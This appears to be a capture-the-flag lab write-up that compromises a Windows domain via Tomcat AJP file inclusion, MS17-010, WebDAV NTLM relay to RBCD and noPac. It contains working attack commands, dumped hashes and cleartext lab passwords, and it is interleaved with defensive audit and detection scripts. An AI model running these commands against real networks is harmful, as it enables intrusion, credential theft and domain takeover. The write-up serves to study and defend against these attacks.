春秋云境 - Spoofing

172.22.11.76 ubuntu: external-facing Tomcat server
172.22.11.45 XR-DESKTOP.xiaorang.lab: host vulnerable to MS17-010
172.22.11.26 XR-LCM3AE8B.xiaorang.lab: WebClient service enabled
172.22.11.6 XIAORANG-DC.xiaorang.lab: domain controller vulnerable to noPac

Key takeaways

1. noPac exploitation; the project page also explains how to use it when MAQ=0: https://github.com/Ridter/noPac

2. Relaying inside the internal network via port forwarding

Tomcat AJP file inclusion

python ajpShooter.py http://ip:8080/ 8009 /WEB-INF/web.xml read
python ajpShooter.py http://ip:8080/ 8009 /upload/2d8d1657...txt eval
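The file read above works because the AJP connector on 8009 is reachable and accepts requests from any client. As an added example (not part of this write-up and not Tomcat's own tooling), the following script audits a Tomcat server.xml for AJP connectors that are bound beyond loopback or that disable the shared secret; the server.xml it parses is a constructed sample embedded inline, with one exposed and one hardened connector.

```python
"""Audit a Tomcat server.xml for exposed AJP connectors.

Added example; the sample configuration below is constructed, not taken from
the lab host.
"""
import xml.etree.ElementTree as ET

# Constructed sample: port 8009 is the weak pattern (all interfaces, no secret),
# port 8010 is the hardened pattern (loopback only, secret required and set).
SAMPLE_SERVER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" />
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"
               secretRequired="false" />
    <Connector port="8010" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="REPLACE-WITH-LONG-RANDOM-SECRET" />
  </Service>
</Server>
"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def audit_ajp_connectors(server_xml: str):
    """Return one finding per AJP connector that is reachable beyond loopback
    or that accepts unauthenticated AJP requests."""
    root = ET.fromstring(server_xml)
    findings = []
    for conn in root.iter("Connector"):
        if "AJP" not in conn.get("protocol", "HTTP/1.1").upper():
            continue
        issues = []

        # No address attribute means the connector binds every interface on
        # Tomcat builds older than 9.0.31 / 8.5.51; pin it to loopback or drop it.
        address = conn.get("address")
        if address is None or address in ("0.0.0.0", "::"):
            issues.append('binds all interfaces (set address="127.0.0.1" or remove the connector)')
        elif address not in LOOPBACK:
            issues.append(f"bound to non-loopback address {address}")

        # secretRequired defaults to true on patched Tomcat; older builds have no
        # such attribute at all and accept any AJP client.
        if conn.get("secretRequired", "true").lower() == "false":
            issues.append('secretRequired="false": unauthenticated AJP accepted')
        elif not conn.get("secret"):
            issues.append("no secret configured: patched Tomcat refuses to start the "
                          "connector, older builds accept anyone")

        if issues:
            findings.append({"port": conn.get("port", "?"), "issues": issues})
    return findings


if __name__ == "__main__":
    for finding in audit_ajp_connectors(SAMPLE_SERVER_XML):
        print(f"AJP connector on port {finding['port']}:")
        for issue in finding["issues"]:
            print(f"  - {issue}")
```

Run it against a real server.xml by reading the file into `audit_ajp_connectors`; an empty result means every AJP connector is either loopback-only with a secret or absent, which is the state that makes the ajpShooter read above impossible from the network.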

MS17-010

172.22.11.45 was compromised via MS17-010 (Metasploit), then credentials were dumped:

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:48f6da83eb89a4da8a1cc963b855a799:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username Domain NTLM SHA1
-------- ------ ---- ----
XR-DESKTOP$ XIAORANG 0498507a97312f834d671acdc616ba9d d12705c4431473386ce8a5a7942a3beffda04f40
yangmei XIAORANG 25e42ef4cc0ab6a8ff9e3edbbda91841 6b2838f81b57faed5d860adaf9401b0edb269a6f

wdigest credentials
===================

Username Domain Password
-------- ------ --------
(null) (null) (null)
XR-DESKTOP$ XIAORANG AM&:=4^NSbVU\Ke-XklyW8eB"?'5ldu/0z9y@Yt3*5I*.>MNcU#>Scjm$q+3EM KoU-C&D\.,-I -,$40cEKUJcI8@yCCvf!b)aP<kkc*3!?*VY\I<xW($)o
yangmei XIAORANG xrihGHgoNZQ

kerberos credentials
====================

Username Domain Password
-------- ------ --------
(null) (null) (null)
xr-desktop$ XIAORANG.LAB (null)
xr-desktop$ XIAORANG.LAB AM&:=4^NSbVU\Ke-XklyW8eB"?'5ldu/0z9y@Yt3*5I*.>MNcU#>Scjm$q+3EM KoU-C&D\.,-I -,$40cEKUJcI8@yCCvf!b)aP<kkc*3!?*VY\I<xW($)o
yangmei XIAORANG.LAB xrihGHgoNZQ

Credentials obtained:

XR-DESKTOP$  XIAORANG  0498507a97312f834d671acdc616ba9d
yangmei XIAORANG 25e42ef4cc0ab6a8ff9e3edbbda91841
yangmei XIAORANG.LAB xrihGHgoNZQ

WebDAV NTLM relay

Use CME's webdav module to check which hosts run the WebClient service:

proxychains4 -q crackmapexec smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -M webdav

Then use CME's PetitPotam module to check whether authentication can be coerced:

proxychains4 -q crackmapexec smb 172.22.11.6/24 -u yangmei -p xrihGHgoNZQ -M petitpotam

So 172.22.11.26 runs the WebClient service, and an NTLM relay is possible.

Tried adding a machine account with addcomputer, but the domain's MAQ=0, so no new accounts can be created; the existing machine credential XR-DESKTOP$ can be used for RBCD instead.

Configuring port forwarding

Write Kali's SSH public key to the entry box, then set up SSH port forwarding:

ssh [email protected] -D 1080 -R 81:127.0.0.1:80

On the entry box, use iox:

./iox fwd -l 80 -r 127.0.0.1:81

Start ntlmrelayx listening, relay 172.22.11.26's authentication to the DC, and set the controlled account XR-DESKTOP$ as the delegate to achieve RBCD:

proxychains4 -q impacket-ntlmrelayx -t ldap://172.22.11.6 --escalate-user 'XR-DESKTOP$' --delegate-access

proxychains4 -q impacket-PetitPotam -u "yangmei" -p "xrihGHgoNZQ" -d xiaorang.lab -dc-ip 172.22.11.6 ubuntu@80/test 172.22.11.26

Request an ST and pass the ticket:

proxychains4 -q impacket-getST xiaorang.lab/'XR-DESKTOP$' -hashes ':0498507a97312f834d671acdc616ba9d' -spn cifs/XR-LCM3AE8B.xiaorang.lab -impersonate Administrator -dc-ip 172.22.11.6

proxychains4 -q impacket-wmiexec xiaorang.lab/[email protected] -k -no-pass -dc-ip 172.22.11.6

Dumped credential: zhanghui/1232126b24cdf8c9bd2f788a9d7c7ed1

noPac

As mentioned earlier, with MAQ=0 this cannot be exploited directly; an account with CreateChild rights must be found and used instead.

> AdFind.exe -sc getacls -sddlfilter ;;"[CR CHILD]";computer;; -recmute

AdFind V01.62.00cpp Joe Richards ([email protected]) October 2023

Using server: XIAORANG-DC.xiaorang.lab:389
Directory: Windows Server 2019 (10.0.17763.1)
Base DN: DC=xiaorang,DC=lab

dn:DC=xiaorang,DC=lab
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT];[CR CHILD];computer;;XIAORANG\MA_Admin

dn:CN=Users,DC=xiaorang,DC=lab
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT][INHERITED];[CR CHILD];computer;;XIAORANG\MA_Admin

...

dn:CN=Computers,DC=xiaorang,DC=lab
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT];[CR CHILD];computer;;S-1-5-21-3598443049-773813974-2432140268-1112
>nTSecurityDescriptor: [DACL] OBJ ALLOW;;[CR CHILD][DEL CHILD];computer;;BUILTIN\Account Operators
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT][INHERITED];[CR CHILD];computer;;XIAORANG\MA_Admin

...

dn:OU=Domain Controllers,DC=xiaorang,DC=lab
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT][INHERITED];[CR CHILD];computer;;XIAORANG\MA_Admin

dn:CN=XIAORANG-DC,OU=Domain Controllers,DC=xiaorang,DC=lab
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT][INHERITED];[CR CHILD];computer;;XIAORANG\MA_Admin

dn:CN=Domain Computers,CN=Users,DC=xiaorang,DC=lab
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT][INHERITED];[CR CHILD];computer;;XIAORANG\MA_Admin

dn:CN=XR-LCM3AE8B,CN=Computers,DC=xiaorang,DC=lab
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT][INHERITED];[CR CHILD];computer;;S-1-5-21-3598443049-773813974-2432140268-1112
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT][INHERITED];[CR CHILD];computer;;XIAORANG\MA_Admin

dn:CN=lishuai,CN=Users,DC=xiaorang,DC=lab
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT][INHERITED];[CR CHILD];computer;;XIAORANG\MA_Admin

dn:CN=sunyu,CN=Users,DC=xiaorang,DC=lab
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT][INHERITED];[CR CHILD];computer;;XIAORANG\MA_Admin

dn:CN=chenchen,CN=Users,DC=xiaorang,DC=lab
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT][INHERITED];[CR CHILD];computer;;XIAORANG\MA_Admin

dn:CN=MA_Admin,CN=Users,DC=xiaorang,DC=lab
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT][INHERITED];[CR CHILD];computer;;XIAORANG\MA_Admin

dn:CN=zhanghui,CN=Users,DC=xiaorang,DC=lab
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT][INHERITED];[CR CHILD];computer;;XIAORANG\MA_Admin

dn:CN=XR-DESKTOP,CN=Computers,DC=xiaorang,DC=lab
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT][INHERITED];[CR CHILD];computer;;S-1-5-21-3598443049-773813974-2432140268-1112
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT][INHERITED];[CR CHILD];computer;;XIAORANG\MA_Admin

241 Objects returned

You can also query the security descriptor of the CN=Computers container directly to see who holds [CR CHILD] on it:
AdFind.exe -b "CN=Computers,DC=xiaorang,DC=lab" nTSecurityDescriptor -sddl+++

This shows that the zhanghui user, a member of the MA_Admin group, has permission to create objects in the domain's Computers container, i.e. to add machine accounts.
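Reading 241 objects of AdFind output by eye is error-prone, and the same question (who can create computer objects, and where) is what a domain audit has to answer before MAQ is relied on as a control. As an added example (not part of this write-up and not an AdFind feature), the script below parses the `-sc getacls` line format shown above into a per-trustee summary of direct and inherited [CR CHILD];computer grants, and flags non-default principals and unresolved SIDs for review. The input is a shortened excerpt of the output above, embedded inline.

```python
"""Summarise AdFind '-sc getacls' output: who can create computer objects, where.

Added example. The sample below is a shortened excerpt of the AdFind output in
the write-up; the ACE line format is
  [DACL] <type>;<flags>;<rights>;<objectType>;<inheritedObjectType>;<trustee>
"""
from collections import defaultdict

SAMPLE_ADFIND_OUTPUT = """
dn:DC=xiaorang,DC=lab
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT];[CR CHILD];computer;;XIAORANG\\MA_Admin

dn:CN=Computers,DC=xiaorang,DC=lab
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT];[CR CHILD];computer;;S-1-5-21-3598443049-773813974-2432140268-1112
>nTSecurityDescriptor: [DACL] OBJ ALLOW;;[CR CHILD][DEL CHILD];computer;;BUILTIN\\Account Operators
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT][INHERITED];[CR CHILD];computer;;XIAORANG\\MA_Admin

dn:CN=zhanghui,CN=Users,DC=xiaorang,DC=lab
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT][INHERITED];[CR CHILD];computer;;XIAORANG\\MA_Admin
"""

# Principals that hold this right by default; still worth checking membership.
WELL_KNOWN = {"BUILTIN\\Account Operators"}


def parse_create_child_aces(text: str):
    """Map trustee -> {'direct': [dn, ...], 'inherited': [dn, ...]} for every
    ALLOW ACE that grants [CR CHILD] for objectClass computer."""
    result = defaultdict(lambda: {"direct": [], "inherited": []})
    dn = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("dn:"):
            dn = line[3:].strip()
        elif line.startswith(">nTSecurityDescriptor:") and dn:
            parts = line.split(":", 1)[1].strip().split(";")
            if len(parts) < 6:
                continue  # not an ACE line we understand
            ace_type, flags, rights, obj_type, _inherited_type, trustee = parts[:6]
            if "ALLOW" not in ace_type or "[CR CHILD]" not in rights:
                continue
            if obj_type.lower() != "computer":
                continue
            bucket = "inherited" if "[INHERITED]" in flags else "direct"
            result[trustee][bucket].append(dn)
    return dict(result)


def review_computer_creators(text: str):
    """Return a review list: one entry per trustee able to create computer
    objects, with a note on whether the grant is expected."""
    report = []
    for trustee, where in parse_create_child_aces(text).items():
        if trustee.startswith("S-1-5-"):
            note = "review: unresolved SID (deleted or foreign principal)"
        elif trustee in WELL_KNOWN:
            note = "expected built-in"
        else:
            note = "review: non-default grant"
        report.append({"trustee": trustee, "note": note,
                       "direct": where["direct"], "inherited": where["inherited"]})
    return sorted(report, key=lambda r: r["trustee"])


if __name__ == "__main__":
    for entry in review_computer_creators(SAMPLE_ADFIND_OUTPUT):
        print(f"{entry['trustee']}: {entry['note']}")
        print(f"  direct on:    {entry['direct']}")
        print(f"  inherited on: {len(entry['inherited'])} object(s)")
```

The direct grant on the domain root is what matters for the MA_Admin group: every inherited line under it is a consequence of that single ACE, so removing or scoping that one entry is the fix, and the unresolved SID on CN=Computers should be identified or removed rather than left to accumulate.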

python noPac.py xiaorang.lab/zhanghui -hashes :1232126b24cdf8c9bd2f788a9d7c7ed1 -use-ldap -create-child -dc-ip 172.22.11.6

The earlier machine account XR-DESKTOP$ can also be used:

python noPac.py xiaorang.lab/'XR-DESKTOP$' -hashes ':03e8d17f4da1797f6b69a9a7a23244c1' -dc-ip 172.22.11.6 --impersonate Administrator -no-add -target-name 'XR-DESKTOP$' -old-hash ':03e8d17f4da1797f6b69a9a7a23244c1' -use-ldap -shell
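Both paths in this write-up leave a clear trace on the domain controller: the relay writes msDS-AllowedToActOnBehalfOfOtherIdentity on the victim computer's own object (event 5136, with the victim machine account as the subject), and noPac renames a computer account so that its sAMAccountName no longer ends in `$` and matches a DC's name (event 4742). As an added example (not from this write-up or the noPac project), the script below runs those two checks over a constructed list of simplified Security events; the field names follow the EventData of events 5136 and 4742, the hostnames and user names in the samples are constructed, and the DC list is assumed from the host table at the top of this page.

```python
"""Detect RBCD attribute writes (5136) and noPac-style computer renames (4742).

Added example. SAMPLE_EVENTS is constructed, simplified telemetry, not logs
from the lab; only the EventData fields the rules need are included.
"""

# Assumed from the host list at the top of the write-up (names without the $).
KNOWN_DCS = {"XIAORANG-DC"}

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
VALUE_ADDED = "%%14674"  # OperationType code for "Value Added" in event 5136

SAMPLE_EVENTS = [
    # Relay signature: the victim machine account writes its own RBCD attribute.
    {"EventID": 5136, "SubjectUserName": "XR-LCM3AE8B$",
     "ObjectDN": "CN=XR-LCM3AE8B,CN=Computers,DC=xiaorang,DC=lab",
     "AttributeLDAPDisplayName": RBCD_ATTR, "OperationType": VALUE_ADDED},
    # Benign attribute change on another computer object (constructed names).
    {"EventID": 5136, "SubjectUserName": "svc_inventory",
     "ObjectDN": "CN=FILE01,CN=Computers,DC=xiaorang,DC=lab",
     "AttributeLDAPDisplayName": "description", "OperationType": VALUE_ADDED},
    # noPac signature: a fresh computer renamed to the DC's name, no trailing $.
    {"EventID": 4742, "SubjectUserName": "zhanghui", "TargetUserName": "WS-NEW$",
     "SamAccountName": "XIAORANG-DC"},
    # Ordinary 4742 where sAMAccountName did not change ("-").
    {"EventID": 4742, "SubjectUserName": "helpdesk", "TargetUserName": "WS-002$",
     "SamAccountName": "-"},
    # Existing machine account renamed without the $ (the -no-add variant).
    {"EventID": 4742, "SubjectUserName": "XR-DESKTOP$", "TargetUserName": "XR-DESKTOP$",
     "SamAccountName": "XR-DESKTOP"},
]


def object_cn(dn: str) -> str:
    """First RDN value of a DN, e.g. 'CN=HOST,CN=Computers,...' -> 'HOST'."""
    first = dn.split(",", 1)[0]
    return first.split("=", 1)[1] if "=" in first else first


def detect_rbcd_writes(events):
    """Flag 5136 events that add a value to the RBCD attribute; a computer
    account writing its own object is the NTLM-relay signature."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 5136 or ev.get("AttributeLDAPDisplayName") != RBCD_ATTR:
            continue
        if ev.get("OperationType") != VALUE_ADDED:
            continue
        subject = ev.get("SubjectUserName", "")
        self_write = subject.rstrip("$").upper() == object_cn(ev.get("ObjectDN", "")).upper()
        alerts.append({
            "rule": "rbcd-attribute-written",
            "severity": "high" if self_write else "medium",
            "subject": subject,
            "object": ev.get("ObjectDN"),
            "detail": ("computer account wrote its own RBCD attribute (relay signature)"
                       if self_write else "RBCD attribute written; confirm against change records"),
        })
    return alerts


def detect_samaccountname_anomalies(events, known_dcs=KNOWN_DCS):
    """Flag 4742 events whose new sAMAccountName drops the trailing $ or
    collides with a domain controller's name."""
    dc_names = {d.upper() for d in known_dcs}
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4742:
            continue
        new_name = ev.get("SamAccountName", "-")
        if new_name in ("-", ""):
            continue  # attribute unchanged in this event
        if new_name.rstrip("$").upper() in dc_names:
            severity, detail = "critical", "computer renamed to a domain controller's name"
        elif not new_name.endswith("$"):
            severity, detail = "high", "computer sAMAccountName lost its trailing $"
        else:
            continue
        alerts.append({"rule": "computer-samaccountname-anomaly", "severity": severity,
                       "subject": ev.get("SubjectUserName"), "object": ev.get("TargetUserName"),
                       "new_name": new_name, "detail": detail})
    return alerts


def triage(events):
    """Run both rules and return the combined alert list."""
    return detect_rbcd_writes(events) + detect_samaccountname_anomalies(events)


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(f"[{alert['severity']}] {alert['rule']}: {alert['subject']} -> {alert['object']}: {alert['detail']}")
```

Both rules need directory-service auditing enabled on the DC (5136 requires a SACL on the computer objects for write-property), and the 4742 rule is deliberately loose: a computer rename that drops the `$` has no legitimate administrative use, so the false-positive cost is low.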